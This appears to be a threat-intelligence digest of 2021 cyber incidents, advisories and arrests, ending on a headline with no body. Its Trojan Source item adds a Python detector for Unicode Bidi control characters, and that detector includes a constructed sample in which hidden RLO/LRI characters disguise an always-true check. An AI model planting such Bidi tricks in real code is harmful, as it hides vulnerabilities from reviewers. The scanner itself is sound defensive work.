    Since February 2021, ANSSI has dealt with a series of phishing campaigns directed against French entities. The campaigns escalated significantly in May 2021. This malicious activity is attributable to one and the same intrusion set. The intrusion set succeeded in compromising email accounts belonging to French organisations, before using these access points to send weaponised emails to foreign institutions in the diplomatic sector. The initial method of intrusion remains unknown.

    Researchers Discover 14 New XS-Leak Web Browser Attacks

    IT security researchers from Ruhr-Universität Bochum (RUB) and the Niederrhein University of Applied Sciences have discovered 14 new types of 'XS-Leak' cross-site leak attacks against modern web browsers, including Google Chrome, Microsoft Edge, Safari, and Mozilla Firefox. These types of side-channel attacks are called 'XS-Leaks,' and allow attackers to bypass the 'same-origin' policy in web browsers so that a malicious website can steal info in the background from a trusted website where the user enters information.

    Colorado Energy Company Loses 25 Years of Data after Cyberattack While Still Rebuilding Network

    Colorado's Delta-Montrose Electric Association (DMEA) is still struggling to recover from a devastating cyberattack last month that took down 90% of its internal systems and caused 25 years of historical data to be lost. In an update sent to customers this week, the company said it expects to be able to begin accepting payments through its SmartHub platform and other payment kiosks during the week of December 6. "We also tentatively estimate we will be able to resume member billing the week of December 6 - 10. We recognize this will result in members receiving multiple energy bills close together. As a reminder, we will not disconnect services for non-payment or assess any penalties through January 31, 2022," the company said on a page that has been updated repeatedly over the last month.

    Twitter Removes 3,400 Accounts Used in Govt Propaganda Campaigns

    Twitter today announced the permanent removal of more than 3,400 accounts linked to governments of six countries running manipulation or spam campaigns. The social networking company says that the accounts were used in eight distinct operations attributed to Mexico, the People's Republic of China (PRC), Russia, Tanzania, Uganda, and Venezuela.

    Phishing Actors Start Exploiting the Omicron COVID-19 Variant

    “Phishing actors have quickly started to exploit the emergence of the Omicron COVID-19 variant and now use it as a lure in their malicious email campaigns.” Threat actors will quickly adjust their phishing email content to match that of hot topics and trends. Preying on people’s urgency and fear can help make phishing campaigns more successful. A user may rush to open an email without thinking it through.

    Planned Parenthood LA Discloses Data Breach after Ransomware Attack

    Planned Parenthood Federation of America, Inc., or Planned Parenthood, is a nonprofit organization that provides reproductive health care in the United States and globally. The organization has disclosed a data breach after suffering a ransomware attack in October that exposed the personal information of approximately 400,000 patients.

    Former Ubiquiti Dev Charged for Trying to Extort His Employer

    Ubiquiti Inc. is an American technology company founded in San Jose, California, in 2003. Now based in New York City, Ubiquiti manufactures and sells wireless data communication and wired products for enterprises and homes under multiple brand names. Nickolas Sharp, a former employee of the networking device maker, was arrested and charged with data theft and attempting to extort his employer while posing as a whistleblower and an anonymous hacker.

    Double Extortion Ransomware Victims Soar 935%

    Researchers have recorded a 935% year-on-year increase in double extortion attacks, with data from over 2,300 companies posted onto ransomware extortion sites. Group-IB’s Hi-Tech Crime Trends 2021/2022 report covers the period from the second half of 2020 to the first half of 2021. Ransomware-as-a-Service (RaaS) groups have partnered with initial access brokers, which has created a large increase in ransomware attacks. Ransomware operators have had affiliates for some time who would provide them with access to networks. Now prominent ransomware groups are leveraging initial access broker communities to improve both their attack surface and profits. Increasing profits from ransomware attacks have created an equally profitable market for criminals interested in selling initial access to various groups.

    Europol Arrested 1,800 Money Mules as Part of an Anti-money-laundering Operation

    Europol has identified 18,351 money mules and arrested 1,803 of them as part of an international anti-money-laundering operation codenamed EMMA 7. The operation is the result of a joint effort of 27 countries, Eurojust, INTERPOL, the European Banking Federation (EBF), and the FinTech FinCrime Exchange. The name EMMA is an acronym for European Money Mule Action; the first EMMA operation led by Europol took place in 2016.

    Ransomware Attack Shuts Down Lewis & Clark Community College

    Lewis and Clark Community College in Godfrey, Ill., closed all its campuses this week and cancelled all extra-curricular activities, including sports. The move was made after the director of information technology noticed suspicious activity last Tuesday and shut down the school's computer network on Wednesday.

    Queensland Government Energy Generator Hit by Ransomware

    Queensland government-owned energy generator CS Energy said on Tuesday it was responding to a ransomware incident that occurred over the weekend. First reported by Energy Source & Distribution, the company said the incident has not impacted electricity generation at Callide and Kogan Creek power station, and it was looking to restore its network.

    Yanluowang Ransomware Operation Matures with Experienced Affiliates

    An affiliate of the recently discovered Yanluowang ransomware operation is focusing its attacks on U.S. organizations in the financial sector using BazarLoader malware in the reconnaissance stage. Based on observed tactics, techniques, and procedures, the threat actor is experienced with ransomware-as-a-service (RaaS) operations and may be linked with the Five Hands group.

    Spy Chief's Warning: Our Foes Are Now 'Pouring Money' into Quantum Computing and AI

    The rise of technologies like artificial intelligence (AI) and quantum computing is changing the world -- and intelligence services must adapt in order to operate in an increasingly digital environment, the head of MI6 has warned. In his first public speech since taking the role of "C" in October 2020, Richard Moore, chief of the UK Secret Intelligence Service (MI6), discussed the challenges posed by the rapid evolution in technology.

    DNA Testing Firm Discloses Data Breach Affecting 2.1 Million People

    DNA Diagnostics Center (DDC), an Ohio-based DNA testing company, has disclosed a hacking incident that affects 2,102,436 persons. The incident resulted in a confirmed data breach that occurred between May 24, 2021, and July 28, 2021, but the firm discovered it only on October 29, 2021.
    The information that the hackers accessed includes the following:
    - Full names
    - Credit card number + CVV
    - Debit card number + CVV
    - Financial account number
    - Platform account password
    The database contained older backups from 2004-2012 and was not linked to active systems. "DDC acquired certain assets from this national genetic testing organization in 2012 that included certain personal information, and therefore, impacts from this incident are not associated with DDC," said the organization.

    Panasonic Discloses Data Breach After Network Hack

    Japanese multinational conglomerate Panasonic disclosed a security breach after unknown threat actors gained access to servers on its network this month. "Panasonic Corporation has confirmed that its network was illegally accessed by a third party on November 11, 2021," the company said in a press release issued Friday. "As the result of an internal investigation, it was determined that some data on a file server had been accessed during the intrusion."

    Wind Turbine Maker Vestas Confirms Recent Security Incident Was Ransomware

    Wind turbine maker Vestas says "almost all" of its IT systems are finally up and running 10 days after a security attack by criminals, confirming that it had indeed fallen victim to ransomware. Alarm bells rang the weekend before last when the Danish organisation said it had identified a "cyber security incident" and closed off parts of its tech estate to "contain the issue."

    APT37 Targets Journalists with Chinotto Multi-Platform Malware

    North Korean state hacking group APT37 targets South Korean journalists, defectors, and human rights activists in watering holes, spear-phishing emails, and smishing attacks delivering malware dubbed Chinotto capable of infecting Windows and Android devices. APT37 (aka Reaper) has been active since at least 2012 and is an advanced persistent threat group (APT) linked to the North Korean government with high confidence by FireEye.

    Biopharmaceutical Firm Supernus Pharmaceuticals Hit by Hive Ransomware During an Ongoing Acquisition

    Biopharmaceutical company Supernus Pharmaceuticals confirmed it was the victim of a data breach after a ransomware attack that hit the firm in mid-November. The company states that the security breach did not impact its operations; it notified government authorities and engaged cybersecurity experts and its outside law firm to respond to the incident. Supernus Pharmaceuticals also declared that it has successfully recovered the encrypted files and has taken additional security measures to prevent future incidents.

    Experts Warn of Attacks Exploiting CVE-2021-40438 Flaw in Apache HTTP Server

    Threat actors are exploiting a recently addressed server-side request forgery (SSRF) vulnerability, tracked as CVE-2021-40438, in Apache HTTP servers. The CVE-2021-40438 flaw can be exploited against httpd web servers that have the mod_proxy module enabled. A threat actor can trigger the issue using a specially crafted request to cause the module to forward the request to an arbitrary origin server.

    Apple Sues NSO Group Over Pegasus Spyware

    Apple on Tuesday filed a lawsuit against mercenary spyware company NSO Group and its parent company, seeking a permanent injunction that bans NSO Group from using any Apple software, services, or devices. The complaint also provides new information on how NSO Group infected victims' Apple devices with its Pegasus spyware. "State-sponsored actors like the NSO Group spend millions of dollars on sophisticated surveillance technologies without effective accountability. That needs to change," said Craig Federighi, Apple SVP of Software Engineering, in a statement. "While these cybersecurity threats only impact a very small number of our customers, we take any attack on our users very seriously, and we're constantly working to strengthen the security and privacy protections in iOS to keep all our users safe."

    Industry Group Sounds Alarm over 'Tardigrade' Malware Targeting Biomanufacturing Sector

    A group of likely foreign government-sponsored hackers is behind cyberattacks on two bio-manufacturing companies that occurred this year, using a kind of malware capable of operating with independence within a network, an industry group warned. The Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) dubbed the malware "Tardigrade" after the resilient micro-animal, and said it looks like the work of an advanced persistent threat group, a term that most often refers to government-backed attackers.

    Biometric Auth Bypassed Using Fingerprint Photo, Printer, and Glue

    Researchers demonstrated that fingerprints could be cloned for biometric authentication for as little as $5 without using any sophisticated or uncommon tools. Although fingerprint-based biometric authentication is generally considered superior to PINs and passwords in terms of security, the fact that imprints can be left in numerous public places makes it ripe for abuse.

    Over 4000 UK Retailers Compromised by Magecart Attacks

    UK government security experts have been forced to notify over 4000 domestic online businesses that their websites were infected with digital skimming code. The GCHQ agency, the National Cyber Security Centre (NCSC), had informed 4151 compromised online shops by the end of September. Most of these were exploited via a known bug in the popular Magento e-commerce software. The NCSC argued digital retailers needed to get their house in order ahead of the busy festive shopping period, which begins at the end of this week with the Black Friday weekend.

    6M Sky Routers Vulnerable to Cyberattacks

    Sky is a UK-based provider of broadband; Sky Broadband is the service offered by Sky UK. 6M Sky routers were left exposed to cyberattacks for almost 18 months, a year and a half during which the company was working to remediate a DNS rebinding flaw in its customers' routers.

    FBI Warning: This Zero-day VPN Software Flaw was Exploited by APT Hackers

    The FBI has warned that a sophisticated group of attackers has exploited a zero-day flaw in a brand of virtual private networking (VPN) software since May. The FBI said its forensic analysis showed that the exploitation of the zero-day vulnerability in the FatPipe WARP, MPVPN, and IPVPN software, by an advanced persistent threat (APT) group, went back to at least May 2021. It did not provide any further information about the identity of the group.

    Vestas impacted by cyber security incident

    Vestas Wind Systems, one of the world's largest makers of wind turbines, today confirmed company data had been compromised in a "cyber security incident" that forced the firm to isolate parts of its I.T. infrastructure. To contain the issue, I.T. systems were shut down across multiple business units and locations.

    New Memento Ransomware Uses Password-protected WinRAR Archives to Block Access to the Files

    In October, Sophos researchers spotted a ransomware called Memento that adopts a curious approach to block access to a victim's files. The ransomware copies files into password-protected WinRAR archives; it uses a renamed freeware version of the legitimate file utility WinRAR. The Memento ransomware then encrypts the password and deletes the original files from the victim's system.

    Rising Cyber Insurance Premiums Highlight Importance of Ransomware Prevention

    A point noted in this report is that insurers often will not cover the total amount of a security incident, meaning that cyber insurance payouts can help only so much. According to the report and news we have shared throughout 2021, ransomware attacks are rising. They will continue to be somewhat lucrative for those involved, especially if insurers continue to honor payouts and meet ransomware demands. According to the report, one client said that they received requests for 30+ ransomware payouts in their first year of operation.

    CISA Publishes Cybersecurity Playbooks for FCEB Agencies

    On November 16, 2021, The US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) published the Cybersecurity Incident & Vulnerability Response Playbooks: Operational Procedures for Planning and Conducting Cybersecurity Incident and Vulnerability Response Activities in FCEB Information Systems.

    Revealed: The 200 Most used and Worst Passwords of 2021

    According to a report from NordPass, people are still using passwords such as "123456," "12345," "password," and "qwerty." Research reveals that these are the weakest passwords nowadays and can easily make you vulnerable to hacking. The password 123456 appeared over 103 million times in NordPass's research.

    OTPBlitz: New OTP retrieval service launched on darknet forum

    A new service known as OTPBlitz has been launched on the darknet forum XSS. OTPBlitz is designed to enable criminals to retrieve one-time passcodes (OTP) from victims by calling them directly and using text-to-speech software to impersonate platforms or services which utilise OTP. The operators target specific platforms or services, such as banks or payment providers, and then attempt to use social engineering via ‘scripts’ read by text-to-speech software to persuade victims to share their OTP.

    China's APT41 Manages Library of Breached Certificates

    A freelance Chinese APT group is actively managing a library of compromised code-signing digital certificates to support cyber-espionage attacks targeting supply chain vendors, according to Venafi. The security vendor’s latest research report details the work of APT41, an unusual group in that it has previously been observed carrying out attacks for both traditional state-sponsored cyber-espionage and personal financial gain.

    US, UK and Australia Warn of Iran-linked APTs Exploiting Fortinet, Microsoft Exchange Flaws

    A joint advisory released by government agencies in the U.S., U.K., and Australia (the FBI, the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom's National Cyber Security Centre (NCSC)) warns that Iran-linked threat actors are exploiting Fortinet and Microsoft Exchange vulnerabilities in attacks aimed at critical infrastructure in the US and at Australian organizations.

    FBI FLASH: AC-000155

    As of November 2021, FBI forensic analysis indicated exploitation of a 0-day vulnerability in the FatPipe MPVPN® device software going back to at least May 2021. The vulnerability allowed APT actors to gain access to an unrestricted file upload function to drop a webshell for exploitation activity with root access, leading to elevated privileges and potential follow-on activity. Exploitation of this vulnerability then served as a jumping-off point into other infrastructure for the APT actors. This vulnerability is not yet identified with a CVE number but can be located with the FatPipe Security Advisory number FPSA006. The vulnerability affects all FatPipe WARP®, MPVPN, and IPVPN® device software prior to the latest version releases 10.1.2r60p93 and 10.2.2r44p1.

    Threat Actors Offer Millions for Zero-days, Developers Talk of Exploit-as-A-service

    One forum user in early May offered $25,000 for proof-of-concept (POC) exploit code for CVE-2021-22893, a critical-severity vulnerability in Pulse Secure VPN that Chinese hackers had leveraged since at least April. Another actor with deeper pockets claimed a budget of up to $3 million for no-interaction remote code execution (RCE) bugs, the so-called zero-click exploits, for Windows 10 and Linux. The same user offered up to $150,000 for original solutions for "unused startup methods in Windows 10" so malware would be active every time the system booted.

    DDoS Attacks Surge 35% in Q3 as VoIP is Targeted

    Security experts have warned of a surge in distributed denial of service (DDoS) attacks in the third quarter, with quantity, size and complexity all increasing in the period. The findings come from Lumen’s Q3 DDoS Report, which revealed that the firm mitigated 35% more attacks in the quarter than Q2 2021. The vendor claimed that the largest bandwidth attack it tackled during the period was 612 Gbps — a 49% increase over Q2. The largest packet rate-based attack scrubbed was 252 Mbps — a 91% increase.

    Now Iran's State-backed Hackers are Turning to Ransomware

    Microsoft has detailed the activities of six Iranian hacker groups that are behind waves of ransomware attacks that have arrived every six to eight weeks since September 2020. Russia is often seen as the home of the biggest cyber-criminal ransomware threats, but state-sponsored attackers from North Korea and Iran have also shown a growing interest in ransomware.

    Intel Addresses 2 High-severity Issues in BIOS Firmware of Several Processors

    Intel disclosed two high-severity vulnerabilities that affect the BIOS firmware in several processor families; both vulnerabilities have received a CVSS v3 score of 8.2. The vulnerabilities, tracked as CVE-2021-0157 and CVE-2021-0158, were discovered by researchers at SentinelOne and can be exploited by an attacker with physical access to the device to elevate privileges.

    New Rowhammer Technique Bypasses Existing DDR4 Memory Defenses

    "Researchers have developed a new fuzzing-based technique called 'Blacksmith' that revives Rowhammer vulnerability attacks against modern DRAM devices that bypasses existing mitigations. The emergence of this new Blacksmith method demonstrates that today's DDR4 modules are vulnerable to exploitation, allowing a variety of attacks to be conducted."

    FBI's Email System Hacked to Send Out Fake Cyber Security Alert to Thousands

    On Saturday, the U.S. Federal Bureau of Investigation (FBI) confirmed unidentified threat actors have breached one of its email servers to blast hoax messages about a fake "sophisticated chain attack." The incident, which was first publicly disclosed by threat intelligence non-profit Spamhaus, involved sending rogue warning emails with the subject line "Urgent: Threat actor in systems" originating from a legitimate FBI email address "eims@ic.fbi[.]gov" that framed the attack on Vinny Troia, a security researcher and founder of dark web intelligence firms Night Lion Security and Shadowbyte, while also claiming him to be affiliated with a hacking outfit named TheDarkOverlord.

    North Korean Hackers Target Cybersecurity Researchers with Trojanized IDA Pro

    Also known by the monikers APT38, Hidden Cobra, and Zinc, the Lazarus Group was active as early as 2009 and linked to a string of attacks for financial gain and harvesting sensitive information from compromised environments. Lazarus, the North Korea-affiliated state-sponsored group, is attempting to once again target security researchers with backdoors and remote access trojans using a trojanized pirated version of the popular IDA Pro reverse engineering software.

    Exchange Exploit Leads to Domain Wide Ransomware

    ProxyShell is a name given to a combination of three vulnerabilities: CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. An attacker chaining the exploitation of these vulnerabilities could execute arbitrary code with SYSTEM privileges on Exchange servers.

    Microsoft Has Released Out-of-Band Security Updates To Address Authentication Issues Affecting Windows Server

    Microsoft has released out-of-band updates to fix authentication failures related to Kerberos delegation scenarios impacting Domain Controllers (DC) running Windows Server. These issues impact Windows Server 2019 and lower versions, including Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2.

    Emotet Malware Is Back and Rebuilding Its Botnet via Trickbot

    The Emotet malware was considered the most widely spread malware in the past, using spam campaigns and malicious attachments to distribute the malware. Emotet would then use infected devices to perform other spam campaigns and install other payloads, such as the QakBot (Qbot) and Trickbot malware. These payloads would then be used to provide initial access to threat actors to deploy ransomware, including Ryuk, Conti, ProLock, Egregor, and many others.

    TeamTNT Group Targets Poorly Configured Docker Servers Exposing REST APIs

    Trend Micro researchers reported that TeamTNT hackers are targeting poorly configured Docker servers exposing Docker REST APIs as part of an ongoing campaign that started in October. Threat actors execute malicious scripts to deploy Monero cryptocurrency miners, perform container-to-host escape using well-known techniques, and scan the Internet for exposed ports from other compromised containers.

    CVE-2021-3064 PAN-OS: Memory Corruption Vulnerability in GlobalProtect Portal and Gateway Interfaces

    Palo Alto Networks issued a critical security advisory for CVE-2021-3064, where a Memory Corruption Vulnerability was discovered in GlobalProtect Portal and Gateway Interfaces. The advisory states that, “A memory corruption vulnerability exists in Palo Alto Networks GlobalProtect portal and gateway interfaces that enables an unauthenticated network-based attacker to disrupt system processes and potentially execute arbitrary code with root privileges. The attacker must have network access to the GlobalProtect interface to exploit this issue.”

    Spike in Conti Ransomware Attacks

    I wanted to let you know that we received information from an internal source that a company that is in the telecommunications industry, or otherwise provides services to those in the field, has confirmed a breach likely on behalf of Conti ransomware operators or its affiliates.

    Medical Software Firm Urges Password Resets after Ransomware Attack

    Medatixx, a German medical software vendor whose products are used in over 21,000 health institutions, urges customers to change their application passwords following a ransomware attack that has severely impaired its entire operations. The firm clarified that the impact has not reached clients and is limited to their internal IT systems and shouldn't affect any of their PVS (practice management systems).

    Meet Lyceum: Iranian Hackers Targeting Telecoms, ISPs

    Researchers have provided a deep dive into the activities of Lyceum, an Iranian threat group focused on infiltrating the networks of telecoms companies and internet service providers (ISPs). Lyceum, also known as Hexane, Siamesekitten, or Spirlin, has been active since 2017. The advanced persistent threat (APT) group has been linked to campaigns striking Middle Eastern oil and gas companies in the past and now appears to have expanded its focus to include the technology sector.

    TA505 Shifts Focus from Malspam to Exploitation of Vulnerabilities

    TA505, also known as FIN11, Buhtrap, Ratopak Spider, Silence, and Gold Evergreen, depending on the security vendor and/or company, has a long history of breaching companies through various initial access vectors. FIN11 activity has been reported since approximately 2006 and is considered one of the most significant financially motivated threat actors because of the large volumes of messages they send to targeted organizations.

    US Charges Ukrainian National for Kaseya Ransomware Attack

    Earlier this year, the attack against Kaseya products had devastating consequences for MSPs, downstream customers, and companies alike. According to multiple sources, five individuals from various parts of the globe have been arrested since February 2021. These five are believed to have been responsible for deploying REvil on systems belonging to some 5,000 organizations.

    Five Affiliates to Sodinokibi/Revil Unplugged

    On 4 November, Romanian authorities arrested two individuals suspected of cyber-attacks deploying the Sodinokibi/REvil ransomware. They are allegedly responsible for 5,000 infections, which in total pocketed half a million euros in ransom payments.

    Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Web shells, NGLite Trojan, and KdcSponge Stealer

    Several nation-state attacks were reported over the weekend where attackers are leveraging CVE-2021-40539 in Zoho ManageEngine ADSelfService Plus build 6114. ManageEngine ADSelfService Plus has integrated self-service password management and a single sign-on solution for Active Directory and cloud apps. On September 16th, 2021, we alerted members of software vulnerabilities that could be leveraged in remote attacks. We shared CISA's alert so that companies could apply patches to mitigate risks as necessary. Initial exploitation is obtained via web shells, including the use of Godzilla, which can be obtained publicly on GitHub. Palo Alto also mentions in their reporting that they observed the use of a new backdoor called NGLite, which is also publicly available on GitHub. Both programs appear to be developed with Chinese instructions, "used for redundancy and to maintain access to high-interest networks."

    Chinese Spy Faces Decades in Jail After Conviction

    A Chinese intelligence officer has been convicted of cyber-espionage by a US federal jury, in the first ever case of its kind. Xu Yanjun, deputy division director of the Sixth Bureau of the Jiangsu Province Ministry of State Security, was found guilty of conspiring to and attempting to commit economic espionage and theft of trade secrets, according to the Department of Justice (DoJ).

    Operation Cyclone Targets Clop Ransomware Affiliates

    Interpol announced the arrest of six alleged affiliates of the Clop ransomware operation as part of an international joint law enforcement operation codenamed Operation Cyclone. Law enforcement authorities from South Korea, Ukraine, and the United States joined their efforts in a 30-month investigation that was coordinated by Interpol.

    Access to Oiltanking platform for sale on Raid Forums

    Access to a platform operated by Oiltanking is for sale on Raid Forums. Oiltanking is a multinational logistics service provider specialising in petroleum products headquartered in Germany. The sale is being conducted by the user mont4na. According to mont4na, this access includes user emails, usernames and plaintext passwords.

    FBI Warns of Increased Use of Cryptocurrency ATMs, QR Codes for Fraud

    The use of QR codes is becoming increasingly common because of the cost reduction; manufacturing companies realize that they can replace paper with technology. They’ve also found a place at conferences, restaurants, and other public places amid the COVID-19 pandemic as a sanitary measure to prevent sickness. Like any other piece of technology, such implementation has security risks associated with its use.

    CISA Urges Vendors to Patch BrakTooth Bugs after Exploits Release

    Researchers have released public exploit code and a proof of concept tool to test Bluetooth devices against System-on-a-Chip (SoC) security bugs impacting multiple vendors, including Intel, Qualcomm, Texas Instruments, and Cypress. Collectively known as BrakTooth, these 16 flaws impact commercial Bluetooth stacks on over 1,400 chipsets used in billions of devices such as smartphones, computers, audio devices, toys, IoT devices, and industrial equipment.

    US Targets DarkSide Ransomware, Rebrands with $10 Million Reward

    The US government is targeting the DarkSide ransomware and its rebrands with up to a $10,000,000 reward for information leading to the identification or arrest of members of the operation. The US Department of State will reward informants who supply the identification or location of DarkSide ransomware members operating in key leadership positions.

    Ransomware Targets Companies During Mergers and Acquisitions

    The Federal Bureau of Investigation (FBI) warns that ransomware gangs are targeting companies involved in "time-sensitive financial events" such as corporate mergers and acquisitions to make it easier to extort their victims. In a private industry notification published on Monday, the FBI said ransomware operators would use the financial information collected before attacks as leverage to force victims to comply with ransom demands.

    Trickbot IOCs October 2021

    A trusted third party to the Cybersecurity and Infrastructure Security Agency (CISA) has provided the attached information regarding Trickbot malware for your awareness and action. Trickbot is a highly modular malware, capable of performing a number of actions on a network such as stealing information or dropping ransomware. The attached "Trickbot" spreadsheet lists Trickbot infrastructure in use in September and October 2021. Specific dates and infrastructure are indicated on the tabs of the spreadsheet.

    Increased Ransomware Activity: Updates on Blackmatter and Recent Attacks

    BlackMatter, the ransomware responsible for targeting various critical infrastructure and industry across the globe, has reportedly added a new tool to its arsenal. BlackMatter uses a ransomware-as-a-service model that allows the ransomware's developers to profit from cybercriminal affiliates. Researchers from Symantec have discovered a new tool that they've named Exmatter; the tool targets specific file types from selected directories and then uploads them to attacker-controlled servers before the ransomware is installed on networks.

    Most Computer Code Compilers Vulnerable to Novel Attacks

    Most computer code compilers are at risk of 'Trojan Source' attacks in which adversaries can introduce targeted vulnerabilities into any software without being detected, according to researchers from the University of Cambridge. The paper, Trojan Source: Invisible Vulnerabilities, detailed how weaknesses in text encoding standards such as Unicode can be exploited "to produce source code whose tokens are logically encoded in a different order from the one they are displayed." This produces vulnerabilities that are very difficult for human code reviewers to detect, as the rendered source code looks perfectly acceptable.
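    The practical defence the paper's finding points to is to refuse or flag source text containing Unicode bidirectional control characters before it reaches review. The scanner below is an added example for this digest, not code from the Cambridge researchers; it lists the nine Bidi control code points from the Unicode standard, reports where each one appears (1-based line and code-point column), and can strip them so a reviewer can diff the logical text. The `SAMPLE` string is constructed to resemble the class of snippet the paper describes and is not taken from the paper.

```python
"""Flag Unicode bidirectional (Bidi) control characters in source text.

Added example; not part of the original digest or the Trojan Source paper.
"""
import sys

# The Bidi control characters that reorder how text is displayed.
# Mapping: code point -> short name from the Unicode standard.
BIDI_CONTROLS = {
    "\u202a": "LRE",  # LEFT-TO-RIGHT EMBEDDING
    "\u202b": "RLE",  # RIGHT-TO-LEFT EMBEDDING
    "\u202c": "PDF",  # POP DIRECTIONAL FORMATTING
    "\u202d": "LRO",  # LEFT-TO-RIGHT OVERRIDE
    "\u202e": "RLO",  # RIGHT-TO-LEFT OVERRIDE
    "\u2066": "LRI",  # LEFT-TO-RIGHT ISOLATE
    "\u2067": "RLI",  # RIGHT-TO-LEFT ISOLATE
    "\u2068": "FSI",  # FIRST STRONG ISOLATE
    "\u2069": "PDI",  # POP DIRECTIONAL ISOLATE
}


def find_bidi_controls(source):
    """Return [(line, column, short_name), ...] for every Bidi control in source.

    Line and column are 1-based; the column counts code points, not bytes,
    so it matches what an editor shows rather than the UTF-8 byte offset.
    """
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            name = BIDI_CONTROLS.get(ch)
            if name is not None:
                findings.append((line_no, col, name))
    return findings


def strip_bidi_controls(source):
    """Return source with every Bidi control removed.

    Diffing the result against the original shows a reviewer the text
    the compiler actually parses, in logical order.
    """
    return "".join(ch for ch in source if ch not in BIDI_CONTROLS)


def scan_file(path):
    """Scan one file on disk; undecodable bytes are replaced, not fatal."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_bidi_controls(fh.read())


# Constructed sample (hypothetical, not from the paper): logically the string
# literal swallows the "comment", so the check is always true, but a Bidi-aware
# renderer displays something that reads like a harmless admin check.
SAMPLE = (
    'access_level = "user"\n'
    'if access_level != "user\u202e \u2066// Check if admin\u2069 \u2066" {\n'
    '    print("You are an admin.")\n'
    '}\n'
)

if __name__ == "__main__":
    paths = sys.argv[1:]
    if not paths:
        # No files given: demonstrate on the constructed sample.
        for line, col, name in find_bidi_controls(SAMPLE):
            print(f"sample:{line}:{col}: {name}")
    for path in paths:
        for line, col, name in scan_file(path):
            print(f"{path}:{line}:{col}: {name}")
```

    Run it as a pre-commit or CI check over every text file in a repository; a non-empty findings list for any file that is not a deliberately bidirectional-text resource should fail the build, and the `strip_bidi_controls` diff shows the reviewer what the compiler really sees.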

    Ransomware Attack Impedes Toronto’s Public Transportation System

    A ransomware attack has disrupted the activities of the Toronto public transportation agency and has taken down several systems used by drivers and commuters alike. The Toronto Transit Commission said the attack was detected last week on Thursday night and was discovered by a TTC IT staffer who detected "unusual network activity."

    BlackMatter: New Data Exfiltration Tool Used in Attacks

    Security researchers have discovered a new data exfiltration tool designed to accelerate information theft for ransomware groups using the BlackMatter variant. The Symantec Threat Hunter team explained in a new blog post today that the custom tool is the third discovery of its kind, following the development of the Ryuk Stealer tool and the LockBit-linked StealBit. The researchers claimed BlackMatter itself is linked to the “Coreid” cybercrime group, which may have also been responsible for Darkside — the variant that led to the Colonial Pipeline outage.

    Hive Ransomware Now Encrypts Linux and FreeBSD Systems

    In a report, ESET researchers revealed that the Hive ransomware gang now also encrypts Linux and FreeBSD using new malware variants specifically developed to target these platforms. However, as Slovak internet security firm ESET discovered, Hive's new encryptors are still in development and still lack functionality. They also said that the Linux variant proved to be quite buggy during ESET's analysis, with the encryption completely failing when the malware was executed with an explicit path.

    FBI: HelloKitty Ransomware Adds DDoS Attacks to Extortion Tactics

    The U.S. Federal Bureau of Investigation (FBI) has sent out a flash alert warning private industry partners that the HelloKitty ransomware gang (aka FiveHands) has added distributed denial-of-service (DDoS) attacks to their arsenal of extortion tactics. The FBI said that the ransomware group would take their victims' official websites down in DDoS attacks if they didn't comply with the ransom demands.

    Ransomware Gangs Use SEO Poisoning To Infect Visitors

    Researchers have spotted two campaigns linked to either the REvil ransomware gang or the SolarMarker backdoor that use SEO poisoning to serve payloads to targets. SEO poisoning, also known as "search poisoning," is an attack method that relies on optimizing websites using 'black hat' SEO techniques to rank higher in Google search results. Due to their high ranking, victims who land on these sites believe they are legitimate, and actors enjoy a heavy influx of visitors who look for specific keywords.

    Data Breach at University of Colorado

    An American university is notifying thousands of former and current students that their personal information may have been compromised during a recent data breach. In a security notice issued October 25, the University of Colorado Boulder (CU Boulder) attributed the breach to an unpatched vulnerability in software provided by a third-party vendor, Atlassian Corporation Plc.

    Misconfigured Database Leaks 880 Million Medical Records

    Researchers have found an unsecured database leaking over 886 million sensitive patient records online. The non-password-protected data trove was found by Jeremiah Fowler and Website Planet and traced to healthcare AI firm Deep 6 AI, which fixed the privacy snafu promptly after it was responsibly disclosed. Deep 6 AI applies intelligent algorithms to medical data to help find patients for clinical trials within minutes. The exposed data included date, document type, physician note, encounter IDs, patient ID, note, UUID, patient type, note ID, date of service, note type, and detailed note text.

    WordPress Plugin Bug Impacts 1M Sites, Allows Malicious Redirects

    The OptinMonster plugin is affected by a high-severity flaw that allows unauthorized API access and sensitive information disclosure on roughly a million WordPress sites. Tracked as CVE-2021-39341, the flaw was discovered by researcher Chloe Chamberland on September 28, 2021, with a patch becoming available on October 7, 2021.

    Microsoft Warns Over Uptick in Password Spraying Attacks

    Cyber attackers aren't just looking for software flaws, supply chain weaknesses, and open RDP connections. The other key asset they are after is identities, especially account details that will give them access to other internal systems. Russian cyber actors were not only behind the SolarWinds attack that trojanized software updates; they have also been using extensive password spraying to steal admin accounts for initial access.

    North Korean State Hackers Start Targeting the IT Supply Chain

    The North Korean state-sponsored Lazarus group has shifted its focus to new targets and was observed by Kaspersky researchers expanding its supply chain attack capabilities. Lazarus has been seen using a new variant of the BLINDINGCAN backdoor to target political think tanks in South Korea and to breach a Latvian IT vendor earlier this year. The infection chain used South Korean security software to deploy a malicious payload.

    Ranzy Locker ransomware hit tens of US companies in 2021

    The FBI published a flash alert warning of Ranzy Locker ransomware operations that had already compromised at least 30 US companies this year. The gang has been active since at least 2020 and has hit organizations across various industries. The attack vector most used by the Ranzy Locker operators is brute-force attempts against Remote Desktop Protocol (RDP) credentials. In recent attacks, the group has also exploited known Microsoft Exchange Server vulnerabilities and used phishing messages to gain access to computer networks.

    Kansas Man Pleads Guilty to Hacking the Post Rock Rural Water District

    This week brought news of another attack on a water treatment facility. Kansas man Wyatt A. Travnichek pleaded guilty to tampering with a computer system responsible for water treatment at the Post Rock Rural Water District. He was also charged with reckless damage to a protected computer through his unauthorized access.

    New Activity From Russian Actor Nobelium and Techniques to Prevent Attacks

